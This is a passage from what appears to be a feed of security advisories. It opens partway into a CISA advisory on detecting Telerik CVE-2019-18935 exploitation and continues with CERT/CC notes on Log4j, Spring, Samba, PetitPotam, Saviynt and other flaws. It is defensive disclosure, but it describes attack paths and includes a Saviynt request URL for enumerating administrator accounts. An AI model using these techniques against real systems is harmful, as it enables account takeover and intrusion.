: Figure 1 is from the creator’s GitHub repo,[7] where the string can be observed in the code. As presented by Bishop Fox and proven during authoring organizations’ investigation of IIS server logs, an exception does not mean that the exploit failed, but more likely that it executed successfully.[3]If a Werfault crash report was written, Windows event application logs may contain evidence of this— even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors.
EventID |
ExecutableInfo |
MapDescription |
Payload |
---|---|---|---|
1000 |
w3wp.exe |1664175639.65719.dll |c:windowssystem32inetsrvw3wp.exe |C:WindowsTemp1664175639.65719.dll |
Application Error |
{"EventData":{"Data":"w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, c:\windows\system32\inetsrv\w3wp.exe, C:\Windows\Temp\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7","Binary":""}} |
1001 |
w3wp.exe |1664175639.65719.dll |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe |
Application Crash |
{"EventData":{"Data":"0, APPCRASH, Not available, 0, w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, nC:\Windows\Temp\WERE3F6.tmp.appcompat.txtnC:\Windows\Temp\WERE639.tmp.WERInternalMetadata.xmlnC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\memory.hdmpnC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\triagedump.dmp, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656, 0, eed89eeb-3d68-11ed-817c-005056990ed7, 4","Binary":""}} |
The EventID field maps to Windows EventIDs for an easy filter. Users can leverage the Windows EventIDs to find malicious DLL with the Unix Epoch time-based name inside the C:WindowsTemp directory.
Depending how log analysis is performed, various filters can be determined. However, if regex is available, the example listed in Table 8 above can be reused to match the Unix Epoch timestamp convention to assist in filtering.
When evidence of malicious DLLs is found, reverse engineering will need to be conducted to fully understand what actions occur as the malicious files could do nearly anything. Leveraging Windows security event logs, as well as Windows PowerShell logs, may provide insight into what actions the DLLs are taking. CISA and authoring organizations recommend the following process:
w3wp.exe
in Windows security event logs (e.g., Windows EventID 4688 New Process created).If Trellix XDR Platform is deployed in an environment and a standard HX triage audit is completed in a timely manner of the suspected use of CVE-2019-18935, an organization can search for file write events from known web processes. This will identify the executables written by the web server process. CISA and authoring organizations specifically recommend searching for the following field value pair:
Field |
Value Begins With |
---|---|
TextAtLowestOffset |
MZ |
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA, FBI, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] Telerik: Exploiting .NET JavaScriptSerializer Deserialization (CVE-2019-18935)
[2] ACSC Advisory 2020-004
[3] Bishop Fox CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI
[4] Volexity Threat Research: XE Group
[5] GitHub: Proof-of-Concept Exploit for CVE-2019-18935
[6] Microsoft: Configure Logging in IIS
[7] GitHub: CVE-2019-18935
Google’s Threat Analysis Group (TAG) contributed to this CSA.
Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we'd welcome your feedback.
]]>Tychon contains a privilege escalation vulnerability due to the use of an OPENSSLDIR
variable that specifies a location where an unprivileged Windows user may be able to place files.
Tychon includes an OpenSSL component that specifies an OPENSSLDIR
variable as a subdirectory that my be controllable by an unprivileged user on Windows. Tychon contains a privileged service that uses this OpenSSL component. A user who can place a specially-crafted openssl.cnf
file at an appropriate path may be able to achieve arbitrary code execution with SYSTEM privileges.
By placing a specially-crafted openssl.cnf
in a location used by Tychon, an unprivileged user may be able to execute arbitrary code with SYSTEM privileges on a Windows system with the vulnerable Tychon software installed.
This issue is addressed in Tychon 1.7.857.82
This document was written by Will Dormann.
CVE IDs: | CVE-2022-26872 |
Date Public: | 2022-04-28 |
Date First Published: | 2022-04-28 |
Date Last Updated: | 2022-04-28 13:07 UTC |
Document Revision: | 1 |
Prior to version 5.14, Qt hard-codes the qt_prfxpath
value to a fixed value, which may lead to privilege escalation vulnerabilities in Windows software that uses Qt.
Prior to version 5.14, Qt hard-codes the qt_prfxpath
value to a value that reflects the path where Qt exists on the system that was used to build Qt. For example, it may refer to a specific subdirectory within C:Qt
, which is the default installation location for Qt on Windows. If software that is built with Qt runs with privileges on a Windows system, this may allow for privilege escalation due to the fact that Windows by default allows unprivileged users to create subdirectories off of the root C:
drive location.
In 2015, a patch was made to windeployqt to strip out any existing qt_prfxpath
value from Qt5Core.dll
. If Windows software that uses Qt prior to version 5.14 is not properly packaged using windeployqt, then it may be vulnerable to privilege escalation.
By placing a file in an appropriate location on a Windows system, an unprivileged attacker may be able to execute arbitrary code with the privileges of the software that uses Qt.
This issue is addressed in Qt 5.14. Starting with this version, Qt no longer hard-codes the qt_prfxpath
value in Qt5Core.dll
.
The windeployqt utility will replace the qt_prfxpath
value in the Qt core DLL with the value of .
, which helps prevent this path from being used to achieve privilege escalation.
This document was written by Will Dormann.
CVE IDs: | CVE-2022-26873 |
Date Public: | 2022-04-28 |
Date First Published: | 2022-04-28 |
Date Last Updated: | 2022-04-28 13:03 UTC |
Document Revision: | 1 |
The Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.
The Spring Framework is a Java framework that can be used to create applications such as web applications. Due to improper handling of PropertyDescriptor objects used with data binding, Java applications written with Spring may allow for the execution of arbitrary code.
Exploit code that targets affected WAR-packaged Java code for tomcat servers is publicly available.
NCSC-NL has a list of products and their statuses with respect to this vulnerability.
By providing crafted data to a Spring Java application, such as a web application, an attacker may be able to execute arbitrary code with the privileges of the affected application. Depending on the application, exploitation may be possible by a remote attacker without requiring authentication.
This issue is addressed in Spring Framework 5.3.18 and 5.2.20. Please see the Spring Framework RCE Early Announcement for more details.
This issue was publicly disclosed by heige.
This document was written by Will Dormann
CVE IDs: | CVE-2022-22965 |
Date Public: | 2022-03-31 |
Date First Published: | 2022-03-31 |
Date Last Updated: | 2022-04-06 22:51 UTC |
Document Revision: | 14 |
Visual Voice Mail (VVM) services transmit unencrypted credentials via SMS. An attacker with the ability to read SMS messages can obtain VVM IMAP credentials and gain access to VVM data.
VVM is specified by Open Mobile Terminal Platform-OMPT and is implemented with SMS and IMAP (and other protocols). VVM IMAP credentials are sent unencrypted in SMS messages. From vvm-disclosure:
When a client sends any sort of STATUS SMS (activate, deactivate, status), the carrier will respond with all credentials needed to log into the IMAP server (i.e. username, password, server host-name).
From section 2.1.1.2 AUTHENTICATE of the OMTP VISUAL VOICEMAIL INTERFACE SPECIFICATION v1.3: "The IMAP4 password is sent in the STATUS SMS message."
To intercept an SMS message, an attacker would need, for example: * temporary physical access to the SIM card, * to operate a spoofed a base station (cell tower), or * to convince a user to install a malicious application that has SMS access.
VVM IMAP services may be widely accessible over the internet or carrier networks.
From vvm-disclosure:
There is no indication on to a victim that someone else has access to their VVM. Android leaves their VVMs on the IMAP server until the client deletes it, so any VVMs on the client are accessible to a malicious actor.
An attacker with the ability to read SMS messages can obtain VVM IMAP credentials and gain access to VVM data.
We are not aware of a practical solution to this vulnerability.
Take general precautions against SMS interception.
If supported, change your VMM password on some basis.
Delete VMM data quickly.
Thanks to Chris Talbot for researching and reporting this vulnerability.
This document was written by Brad Runyon.
CVE IDs: | CVE-2022-23835 |
Date Public: | 2022-02-24 |
Date First Published: | 2022-02-24 |
Date Last Updated: | 2022-02-24 19:51 UTC |
Document Revision: | 1 |
The backend infrastructure shared by multiple mobile device monitoring services does not adequately authenticate or authorize API requests, creating an IDOR (Insecure Direct Object Reference) vulnerability. These services and their associated apps can be used to perform non-consensual, unauthorized monitoring and are commonly called "stalkerware." An unauthenticated remote attacker can access personal information collected from any device with one of the stalkerware variants installed.
IDOR is a common web application flaw that essentially exposes information on a server because of insufficient authentication or authorization controls. Multiple services and apps are affected by this backend vulnerability. A list of known vendors is included below.
For more information and a detailed account of the flaw and investigation, please see "Behind the stalkerware network spilling the private phone data of hundreds of thousands."
An unauthenticated remote attacker can access personal information collected from any device with one of the stalkerware variants installed.
We are unaware of a practical solution to this problem. The infrastructure provider (according to the TechCrunch investigation, 1Byte Software), would need to address the IDOR vulnerability.
For advice on detecting and removing stalkerware apps, see "Your Android phone could have stalkerware, here's how to remove it." As noted by TechCrunch:
Before you proceed, have a safety plan in place. The Coalition Against Stalkerware offers advice and guidance for victims and survivors of stalkerware. Spyware is designed to be covert, but keep in mind that removing the spyware from your phone will likely alert the person who planted it, which could create an unsafe situation.
Thanks to Zack Whittaker from TechCrunch for researching and reporting this vulnerability and investigating the wider security concerns related to stalkerware.
This document was written by James Stanley and Art Manion.
CVE IDs: | |
Date Public: | 2022-02-22 |
Date First Published: | 2022-02-22 |
Date Last Updated: | 2022-02-22 16:48 UTC |
Document Revision: | 2 |
The InsydeH2O Hardware-2-Operating System (H2O) UEFI firmware contains multiple vulnerabilities related to memory management in System Management Mode (SMM).
UEFI software provides an extensible interface between an operating system and platform firmware. UEFI software uses a highly privileged processor execution mode called System Management Mode (SMM) for handling system-wide functions like power management, system hardware control, or proprietary OEM-designed code. SMM's privileges, also referred to as "Ring -2," exceed the privileges of the operating system's kernel ("Ring-0"). For this reason, SMM is executed in a protected area of memory called the SMRAM. It is typically accessed via System Management Interrupt (SMI) Handlers using communication buffers, which are also known as "SMM Comm Buffers." The SMM also provides protection against SPI flash modifications and performs boot time verifications similar to those performed by SecureBoot.
UEFI software requires both openness (for hardware drivers, pluggable devices and Driver eXecution Environment (DXE) updates) as well as very tight security controls (for e.g., SMM Comm Buffer Security), making it a complex software that needs a thorough set of security controls that need validation throughout the software's lifecycle. UEFI also supports recent capabilities like Virtual Machine Manager (VMM) for virtualization and the increasing demand of virtual computing resources.
Insyde's H2O UEFI firmware contains several (23) memory management vulnerabilities that were disclosed by Binarly. While these vulnerabilities were discovered in Fujitsu and Bull Atos implementations of Insyde H2O software, the same software is also present in many other vendor implementations due to the complex UEFI supply chain. The vulnerabilities can be classified by the following UEFI vulnerability categories.
Vulnerability Category | Count |
SMM Privilege Escalation | 10 |
SMM Memory Corruption | 12 |
DXE Memory Corruption | 1 |
The impacts of these vulnerabilities vary widely due to the nature of SMM capabilities. As an example, a local attacker with administrative privileges (or a remote attacker with administrative privileges) can exploit these vulnerabilities to elevate privileges above the operating system to execute arbitrary code in SMM mode. These attacks can be invoked from the operating system using the unverified or unsafe SMI Handlers, and in some cases these bugs can also be triggered in the UEFI early boot phases ( as well as sleep and recovery like ACPI) before the operating system is initialized.
In summary, a local attacker with administrative privileges (in some cases a remote attacker with administrative privileges) can use malicious software to perform any of the following:
Install the latest stable version of firmware provided by your PC vendor or your nearest reseller of your computing environments. See the links below to resources and updates provided by specific vendors.
If your operating system supports automatic or managed updates for firmware, such as Linux Vendor Firmware Service (LVFS), apply the related software security updates. Binarly has also provided a set of UEFI software detection rules called FwHunt rules to assist with identifying vulnerable software. LVFS applies these FwHunt rules to detect and support the fix of firmware updates that are impacted by this advisory.
The efiXplorer team of Binarly researched and reported these vulnerabilities to Insyde Software. Insyde Software worked closely with CERT/CC during the coordinated disclosure process for these vulnerabilities.
This document was written by Vijay Sarvepalli.
CVE IDs: | CVE-2021-41840 CVE-2020-5953 CVE-2021-45969 CVE-2021-41838 CVE-2022-24069 CVE-2021-33626 CVE-2020-27339 CVE-2021-41837 CVE-2021-33627 CVE-2021-41841 CVE-2021-45970 CVE-2021-43522 CVE-2021-42113 CVE-2021-42554 CVE-2021-45971 CVE-2021-43323 CVE-2022-24031 CVE-2021-33625 CVE-2021-43615 CVE-2022-24030 CVE-2021-42060 CVE-2021-42059 CVE-2021-41839 |
Date Public: | 2022-02-01 |
Date First Published: | 2022-02-01 |
Date Last Updated: | 2022-02-01 21:51 UTC |
Document Revision: | 4 |
The Samba vfs_fruit module allows out-of-bounds heap read and write via extended file attributes (CVE-2021-44142). This vulnerability allows a remote attacker to execute arbitrary code with root privileges.
The Samba vfs_fruit
module uses extended file attributes (EA, xattr) to provide "...enhanced compatibility with Apple SMB clients and interoperability with a Netatalk 3 AFP fileserver." Samba with vfs_fruit
configured allows out-of-bounds heap read and write via specially crafted extended file attributes.
For more information, see the Samba announcement for CVE-2021-44142 and bug 14914.
A remote attacker with write access to extended file attributes can execute arbitrary code with the privileges of smbd
, typically root.
From the Samba annoucement for CVE-2021-44142:
Access as a user that has write access to a file's extended attributes is required to exploit this vulnerability. Note that this could be a guest or unauthenticated user if such users are allowed write access to file extended attributes.
Samba has released versions 4.13.17, 4.14.12, and 4.15.5.
As a workaround, remove 'fruit' from 'vfs objects' lines in Samba configuration files (e.g., smb.conf
).
Thanks to Orange Tsai of DEVCORE for researching and reporting this vulnerability. Thanks also to Samba, ZDI, and Western Digital for coordination efforts.
This document was written by James Stanley and Art Manion.
CVE IDs: | CVE-2021-44142 |
Date Public: | 2022-01-31 |
Date First Published: | 2022-01-31 |
Date Last Updated: | 2022-01-31 19:09 UTC |
Document Revision: | 6 |
McAfee Agent contains a privilege escalation vulnerability due to the use of an OPENSSLDIR
variable that specifies a location where an unprivileged Windows user may be able to place files.
CVE-2022-0166
McAfee Agent, which comes with various McAfee products such as McAfee Endpoint Security, includes an OpenSSL component that specifies an OPENSSLDIR
variable as a subdirectory that my be controllable by an unprivileged user on Windows. McAfee Agent contains a privileged service that uses this OpenSSL component. A user who can place a specially-crafted openssl.cnf
file at an appropriate path may be able to achieve arbitrary code execution with SYSTEM privileges.
By placing a specially-crafted openssl.cnf
in a location used by McAfee Agent, an unprivileged user may be able to execute arbitrary code with SYSTEM privileges on a Windows system with the vulnerable McAfee Agent software installed.
This vulnerability is addressed in McAfee Agent version 5.7.5.
This vulnerability was reported by Will Dormann of the CERT/CC.
This document was written by Will Dormann.
CVE IDs: | CVE-2022-0166 |
Date Public: | 2022-01-20 |
Date First Published: | 2022-01-20 |
Date Last Updated: | 2022-01-20 21:47 UTC |
Document Revision: | 1 |
Various Silicon Labs Z-Wave chipsets do not support encryption, can be downgraded to not use weaker encryption, and are vulnerable to denial of service. Some of these vulnerabilities are inherent in Z-Wave protocol specifications.
Z-Wave devices based on Silicon Labs chipsets have multiple vulnerabilities. For further details, including specific devices tested, see Riding the IoT Wave With VFuzz: Discovering Security Flaws in Smart Homes.
CVE-2020-9057 Z-Wave devices based on Silicon Labs 100, 200, and 300 series chipsets do not support encryption.
CVE-2020-9058 Z-Wave devices based on Silicon Labs 500 series chipsets using CRC-16 encapsulation do not implement encryption or replay protection.
CVE-2020-9059 Z-Wave devices based on Silicon Labs 500 series chipsets using S0 authentication are susceptible to uncontrolled resource consumption which can lead to battery exhaustion.
CVE-2020-9060 Z-Wave devices based on Silicon Labs 500 series chipsets using S2 are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages.
CVE-2020-9061
Z-Wave devices using Silicon Labs 500 and 700 series chipsets are susceptible to denial of service via malformed routing messages.
Depending on the chipset and device, an attacker within Z-Wave radio range can deny service, cause devices to crash, deplete batteries, intercept, observe, and replay traffic, and control vulnerable devices.
Mitigations for these vulnerabilities vary based on the chipset and device. In some cases it may be necessary to upgrade to newer hardware, for example, 500 and 700 series chipsets that support S2 authentication and encryption.
Thanks to Carlos Nkuba Kayembe, Kim Seulbae, Sven Dietrich, and Heejo Lee for reporting these vulnerabilities.
This document was written by and Timur Snoke and Art Manion.
CVE IDs: | CVE-2020-9057 CVE-2020-9061 CVE-2020-9059 CVE-2020-9060 CVE-2020-9058 |
Date Public: | 2022-01-07 |
Date First Published: | 2022-01-07 |
Date Last Updated: | 2022-01-07 21:58 UTC |
Document Revision: | 3 |
Saviynt Enterprise Identity Cloud contains user enumeration and authentication bypass vulnerabilities in the local password reset feature. Together, these vulnerabilities could allow a remote, unauthenticated attacker to gain administrative privileges if an SSO solution is not configured for authentication.
Saviynt Enterprise Identity Cloud contains two vulnerabilities in the password reset feature for the local authentication system. Specifying the id
parameter returns user names and it is common that accounts with administrative privileges have low (often single digit) id
values.
/ECM/maintenance/forgotpasswordstep1?otpConfig=false&id=5
It is then possible to either unhide a button or directly access a URL that bypasses verification and allows the password to be changed. Accessing a login URL with the new credentials yields cookies that can be used to authenticate to the Enerprise Identity Cloud instance.
If another authentication or SSO system is configured, then it is not possible to exploit these vulnerabilities.
A remote, unauthenticated attacker can enumerate users and bypass authentication to change the password of an existing administrative user. The attacker can then perform administrative actions and possibly make changes to other connected authentication systems.
Saviynt has deployed a backend update for the software that is intended to address the issue in Saviynt IGA Release v5.5 SP2.x and later versions. Saviynt has also blocked access to some of the URLs need to exploit these vulnerabilities.
Saviynt users should not need to take any action but might want to confirm they are running a fixed version.
This document was written by Eric Hatleback and Art Manion.
CVE IDs: | |
Date Public: | 2021-12-22 |
Date First Published: | 2021-12-22 |
Date Last Updated: | 2021-12-22 16:09 UTC |
Document Revision: | 3 |
Apache Log4j allows insecure JNDI lookups that could allow an unauthenticated, remote attacker to execute arbitrary code with the privileges of the vulnerable Java application using Log4j.
CISA has published Apache Log4j Vulnerability Guidance and provides a Software List.
The default configuration of Apache Log4j supports JNDI (Java Naming and Directory Interface) lookups that can execute arbitrary code provided by remote services such as LDAP, RMI, and DNS.
More information is available from the Apache Log4j Security Vulnerabilities page, including these highlights:
Log4j 1.x
Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when they use JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability. To mitigate: audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.
log4j-core
Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
CVE-2021-44228 tracks the initial JNDI injection and RCE vulnerability in Log4j 2. CVE-2021-4104 tracks a very similar vulnerability that affects Log4j 1 if JMSAppender and malicious connections have been configured. CVE-2021-45046 tracks an incomplete fix for CVE-2021-44228 affecting Log4j 2.15.0 when an attacker has "...control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern."
We provide tools to scan for vulnerable jar files.
A remote, unauthenticated attacker with the ability to log specially crafted messages can cause Log4j to connect to a service controlled by the attacker to download and execute arbitrary code.
In Log4j 2.12.2 (for Java 7) and 2.16.0 (for Java 8 or later) the message lookups feature has been completely removed. In addition, JNDI is disabled by default and other default configuration settings are modified to mitigate CVE-2021-44228 and CVE-2021-45046.
For Log4j 1, remove the JMSAppender class or do not configure it. Log4j 1 is not supported and likely contains unfixed bugs and vulnerabilities such as CVE-2019-17571.
For applications, services, and systems that use Log4j, consult the appropriate vendor or provider. See the CISA Log4j Software List and the Systems Affected section below.
Remove the JndiLookup class from the classpath, for example:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
As analysis has progressed, certain mitigations have been found to be incomplete. See "Older (discredited) mitigation measures" on the Apache Log4j Security Vulnerabilities page.
SLF4J also recommends write-protecting Log4j configuration files.
Apache credits Chen Zhaojun of Alibaba Cloud Security Team for reporting CVE-2021-44228 and CVE-2021-4104 and Kai Mindermann of iC Consult for CVE-2021-45046.
Much of the content of this vulnerability note is derived from Apache Log4j Security Vulnerabilities and http://slf4j.org/log4shell.html.
This document was written by Art Manion.
CVE IDs: | CVE-2021-44228 |
Date Public: | 2021-12-15 |
Date First Published: | 2021-12-15 |
Date Last Updated: | 2021-12-15 03:38 UTC |
Document Revision: | 4 |
Attacks that allow for unintended control of Unicode and homoglyphic characters, described by the researchers in this report leverage text encoding that may cause source code to be interpreted differently by a compiler than it appears visually to a human reviewer. Source code compilers, interpreters, and other development tools may permit Unicode control and homoglyph characters, changing the visually apparent meaning of source code.
Internationalized text encodings require support for both left-to-right languages and also right-to-left languages. Unicode has built-in functions to allow for encoding of characters to account for bi-directional, or Bidi ordering. Included in these functions are characters that represent non-visual functions. These characters, as well as characters from other human language sets (i.e., English vs. Cyrillic) can also introduce ambiguities into the code base if improperly used.
This type of attack could potentially be used to compromise a code base by capitalizing on a gap in visually rendered source code as a human reviewer would see and the raw code that the compiler would evaluate.
The use of attacks that incorporate maliciously encoded source code may go undetected by human developers and by many automated coding tools. These attacks also work against many of the compilers currently in use. An attacker with the ability to influence source code could introduce undetected ambiguity into source code using this type of attack.
The simplest defense is to ban the use of text directionality control characters both in language specifications and in compilers implementing these languages.
Two CVEs were assigned to address the two types of attacks described in this report.
CVE-2021-42574 was created for tracking the Bidi attack. CVE-2021-42694 was created for tracking the homoglyph attack.
Thanks to the reporters, Nicholas Boucher and Ross Anderson of The University of Cambridge (UK).
This document was written by Chuck Yarbrough.
CVE IDs: | CVE-2021-42574 CVE-2021-42694 |
Date Public: | 2021-11-09 |
Date First Published: | 2021-11-09 |
Date Last Updated: | 2021-11-09 16:38 UTC |
Document Revision: | 1 |
The default security configuration in Salesforce allows an authenticated user with the Salesforce-CLI to create URL that will allow anyone, anywhere access to the Salesforce GUI with the same administrative credentials without a log trace of access or usage of the API.
The Salesforce-cli interface allows an authenticated user to create an access URL using the CLI interface. This URL can be shared as a link, so anyone who has the link can access this site from anywhere (any IP address or any device) with the same access rights as the creator or the URL. This access is only available for the duration of the access token, however this new access will not be logged or tracked in any way available to the user or to the user's organization. The generated URL requires no user/pass or any form of challenge/response, such as MFA, to verify the identity of the new access. OWASP API Security 2019 recommends a number of protections (relevant sections API2:2019, API6:2019 and API10:2019) of API endpoints that will prevent potential abuse of such API endpoints by malicious actors, including malicious insiders.
An unauthenticated user who gains access to an URL, generated by Salesforce-cli, can perform administrative actions as if logged in with the same rights as the account owner who generated the URL. This includes the ability to add user accounts that have administrative rights, manage existing users or applications, and any other action that is available to the user who generated the URL.
In the Salesforce GUI you can Modify Session Security Settings, it is possible to Lock Sessions to the IP address that the session originated on, which would limit the ability for the URL to be shared with other hosts. The default configuration does not have this lock enabled because it may impact various applications and some mobile devices. It is also possible to lock down sessions using domain names instead of IP addresses. It is recommended that Salesforce customers verify that their applications do not require such untethered or unmonitored access or that using custom generated URL's is currently required in their operations before enforcing the above recommended access control.
Thanks to the reporter, who wishes to remain anonymous, for reporting this vulnerability.
This document was written by Timur Snoke.
CVE IDs: | |
Date Public: | 2021-10-04 |
Date First Published: | 2021-10-04 |
Date Last Updated: | 2021-10-04 18:36 UTC |
Document Revision: | 2 |
HCC Embedded's software called InterNiche stack (NicheStack) and NicheLite, which provides TCP/IP networking capability to embedded systems, is impacted by multiple vulnerabilities. The Forescout and JFrog researchers who discovered this set of vulnerabilities have identified these as "INFRA:HALT"
HCC Embedded acquired NicheStack from Interniche in order to provide TCP/IP protocol capabilities to lightweight devices such as IoT. NicheStack has been made available since late 1990's to a widely varied customer base in multiple forms to support various implementations. This has made NicheStack to be part of a complex supply chain into major industries including devices in critical infrastructure.
Forescout and JFrog researchers have identified 14 vulnerabilities related to network packet processing errors in NicheStack and NicheLite versions 4.3 released before 2021-05-28. Most of these vulnerabilities stem from improper memory management commonly seen in lightweight operating systems. Of these 14 vulnerabilities, five involve processing of TCP and ICMP (OSI Layer-4 protocols) and the rest involve common application protocols such as HTTP and DNS (OSI Layer-7). The processing of these OSI layers involve a number of boundary checks and some specific "application" processing capabilities (such as randomization) commonly overlooked in development of lightweight networking software.
Various stakeholders, including HCC Embedded, have made attempts to reach impacted vendors to provide software fixes that address these issues. A lack of formalization of software OEM relationships and a lack of Software Bill of Materials (SBOM) has complicated this outreach and the much-needed identification of impacted devices.
The impact of exploiting these vulnerabilities will vary widely, depending on the implementation options used while developing embedded systems that use NicheStack or NicheLite. As these vulnerabilities involve processing of network packets, attackers can generally abuse these errors via remote network access. In summary, a remote, unauthenticated attacker may be able to use specially-crafted network packets to cause a denial of service, disclose information, or in some cases be able to execute arbitrary code on the target device.
The most reliable way to address these vulnerabilities is to update to the latest stable version of NicheStack software mentioned in HCC Embedded mentioned in their Security Advisories. If you are unsure or have discovered NicheStack using open-source tools provided by Forescout, reach out to HCC Embedded via their PSIRT security team or to your upstream vendor in your supply chain to obtain the software fixes. HCC has also provided a register to be notified web page for sustaining this outreach for their long-standing customers.
CERT/CC recognizes that many implementations of NicheStack involve longer lifecycles for patching. In the meantime, if feasible, organizations can consider isolating impacted devices and blocking network attacks using network inspection, as detailed below, when network isolation is not feasible. It is recommended that security features available to you in devices such as router, firewalls for blocking anomalous network packets are enabled and properly configured. Below is a list of possible mitigations that address some specific network attacks that attempt to exploit these vulnerabilities.
When blocking or isolating is not an option, perform passive inspection using IDS that can alert on anomalous attempts to exploit these vulnerabilities. See also our recommendations and IDS rules that were made available for Treck TCP/IP stack related vulnerabilities VU#257161 for examples.
Thanks to Amine Amri, Stanislav Dashevskyi, and Daniel dos Santos from Forescout, and Asaf Karas and Shachar Menashe from JFrog who reported these vulnerabilities and supported coordinated disclosure. HCC Embedded, the primary OEM vendor, also supported our efforts to coordinate and develop security fixes to address these issues.
This document was written by Vijay Sarvepalli.
CVE IDs: | CVE-2020-25928 CVE-2021-31400 CVE-2021-31228 CVE-2020-35685 CVE-2021-31401 CVE-2021-27565 CVE-2020-35683 CVE-2020-35684 CVE-2020-25926 CVE-2020-25767 CVE-2021-31226 CVE-2021-31227 CVE-2020-25927 CVE-2021-36762 |
Date Public: | 2021-08-10 |
Date First Published: | 2021-08-10 |
Date Last Updated: | 2021-08-10 16:50 UTC |
Document Revision: | 1 |
HTTP web proxies and web accelerators that support HTTP/2 for an HTTP/1.1 backend webserver are vulnerable to HTTP Request Smuggling.
The affected systems allow invalid characters such as carriage return and newline characters in HTTP/2 headers. When an attacker passes these invalid contents to a vulnerable system, the forwarded HTTP/1 request includes the unintended malicious data. This is commonly known as HTTP Request Splitting. In the case of HTTP web proxies, this vulnerability can lead to HTTP Request smuggling, which enables an attacker to access protected internal sites.
An attacker can send a crafted HTTP/2 request with malicious content to bypass network security measures, thereby reaching internal protected servers and accessing sensitive data.
Install vendor-provided patches and updates to ensure malicious HTTP/2 content is blocked or rejected as described in RFC 7540 (Section 8.1.2.6) and RFC 7540 (Section 10.3). Both "request" and "response" should be inspected by the web proxy and rejected in accordance with Stream Error Handling as described in RFC 7450 (Section 5.4.2).
If HTTP/2 is not supported, block the protocol on the web proxies to avoid abuse of HTTP/2 protocol. Where HTTP/2 is supported, enforce strict rules for HTTP header checks to ensure malicious headers are normalized or rejected.
Checks of this type include:
* HTTP Headers with invalid Header name or value
* HTTP Headers with invalid or no content-length
* Unsupported or invalid HTTP methods
Scan your public web server proxy with OWASP recommended tests to ensure your web servers are not vulnerable to abuse via HTTP response splitting.
Thanks to the reporter James Kettle of PortSwigger for the information about this vulnerability.
This document was written by Timur Snoke.
CVE IDs: | |
Date Public: | 2021-08-06 |
Date First Published: | 2021-08-06 |
Date Last Updated: | 2021-08-06 12:23 UTC |
Document Revision: | 1 |
Microsoft Windows Active Directory Certificate Services (AD CS) by default can be used as a target for NTLM relay attacks, which can allow a domain-joined computer to take over the entire Active Directory.
PetitPotam is a tool to force Windows hosts to authenticate to other machines by using the Encrypting File System Remote (EFSRPC) EfsRpcOpenFileRaw method. When a system handles an EfsRpcOpenFileRaw
request, it will by default use NTLM to authenticate with the host that is specified within the path to the file specified in the EfsRpcOpenFileRaw
request. The user specified in the NTLM authentication information is the computer account of the machine that made the EfsRpcOpenFileRaw
request.
The EfsRpcOpenFileRaw()
function does not require credentials to be explicitly specified for it to be dispatched. Code running on any domain-joined system can trigger this function to be called on a domain controller without needing to know the credentials of the current user or any other user in an Active Directory. And because the EfsRpcOpenFileRaw
method authenticates as the machine dispatching the request, this means that a user of any system connected to an AD domain can trigger an NTLM authentication request as the domain controller machine account to an arbitrary host, without needing to know any credentials. This can allow for NTLM relay attacks.
One publicly-discussed target for an NTLM relay attack from a domain controller is a machine that hosts Microsoft AD CS. By relaying an NTLM authentication request from a domain controller to the Certificate Authority Web Enrollment or the Certificate Enrollment Web Service on an AD CS system, an attacker can obtain a certificate that can be used to obtain a Ticket Granting Ticket (TGT) from the domain controller. This attack, known as a "Golden Ticket" attack, can be used to fully compromise the entire Active Directory infrastructure.
Although Microsoft refers to this entire attack chain as "PetitPotam" in KB5005413, it is important to realize that PetitPotam is simply the single PoC exploit used to invoke an NTLM authentication request by way of a EfsRpcOpenFileRaw
request. It should be noted that:
By making a crafted RPC request to a vulnerable Windows system, a remote attacker may be able to leverage the NTLM authentication information that is included in the request that is generated. In the case of AD CS, this can allow an attacker on any domain-joined system to be able to compromise the Active Directory.
